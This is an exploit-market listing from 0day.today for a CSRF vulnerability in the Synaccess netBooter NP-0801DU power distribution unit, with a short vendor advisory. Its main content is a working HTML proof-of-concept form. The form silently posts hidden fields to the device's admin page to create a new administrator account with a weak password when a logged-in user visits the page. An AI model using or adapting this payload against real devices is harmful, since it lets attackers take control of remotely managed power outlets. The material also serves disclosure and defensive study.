[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Synaccess netBooter NP-0801DU 7.4 Cross Site Request Forgery Vulnerability

Author
LiquidWorm
Risk
[
Security Risk Low
]
0day-ID
0day-ID-31653
Category
web applications
Date add
20-11-2018
Platform
hardware
<!--

Synaccess netBooter NP-0801DU 7.4 CSRF Add Admin Exploit


Vendor: Synaccess Networks Inc.
Product web page: https://www.synaccess-net.com
Affected version: NP-0801DU (HW6.0 BL1.5 FW7.23 WF7.4)

Summary: netBooter NP-0801DU and NP-0801DUH PDUs provide secured
remote power source management of 8 independent outlets. Includes
true RMS AC current reading and environment temperature monitoring
via TCP/IP networks or local direct connection.

Desc: The application interface allows users to perform certain
actions via HTTP requests without performing any validity checks
to verify the requests. This can be exploited to perform certai
 actions with administrative privileges if a logged-in user visits
a malicious web site.

Tested on: Synaccess server


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2018-5501
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5501.php


05.11.2018

-->

<html>
  <body>
   <form action="http://10.0.0.19:8082/adm.htm" method="POST">
     <input type="hidden" name="add1" value="Nimda" />
     <input type="hidden" name="add2" value="123456" />
     <input type="hidden" name="add3" value="123456" />
     <input type="hidden" name="adm0" value="1" />
     <input type="submit" value="Gou" />
   </form>
  </body>
</html>

#  0day.today [2024-12-24]  #